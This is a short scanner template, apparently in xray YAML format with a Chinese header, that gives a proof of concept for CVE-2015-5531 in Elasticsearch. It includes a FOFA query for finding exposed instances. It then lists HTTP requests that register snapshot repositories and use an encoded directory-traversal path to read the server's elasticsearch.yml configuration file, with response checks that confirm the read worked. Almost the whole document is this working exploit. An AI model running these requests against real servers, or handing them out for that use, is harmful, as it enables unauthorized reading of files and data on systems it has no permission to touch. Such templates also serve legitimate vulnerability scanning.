漏洞描述
fofa app="elastic-Elasticsearch"
CVE-2015-5531: Elasticsearch CVE-2015-5531
PoC代码[已公开]
id: CVE-2015-5531
info:
name: Elasticsearch CVE-2015-5531
author: ha9worm(https://github.com/ha9worm)
severity: medium
description: fofa app="elastic-Elasticsearch"
set:
r1: randomLowercase(4)
rules:
r0:
request:
method: PUT
path: /_snapshot/{{r1}}
headers:
Content-Type: application/x-www-form-urlencoded
body: |-
{
"type": "fs",
"settings":{
"location": "/usr/share/elasticsearch/repo/{{r1}}"
}
}
follow_redirects: true
expression: response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"{\"acknowledged\":true}")
r1:
request:
method: PUT
path: /_snapshot/{{r1}}2
headers:
Content-Type: application/x-www-form-urlencoded
body: |-
{
"type": "fs",
"settings":{
"location": "/usr/share/elasticsearch/repo/{{r1}}/snapshot-backdata"
}
}
follow_redirects: true
expression: response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"{\"acknowledged\":true}")
r2:
request:
method: GET
path: /_snapshot/{{r1}}/backdata%2f..%2f..%2f..%2fconfig%2felasticsearch.yml
follow_redirects: true
expression: response.status == 400 && response.content_type.contains("application/json") && response.body.bcontains(b"{\"error\":\"ElasticsearchParseException[Failed to derive xcontent from")
expression: r0() && r1() && r2()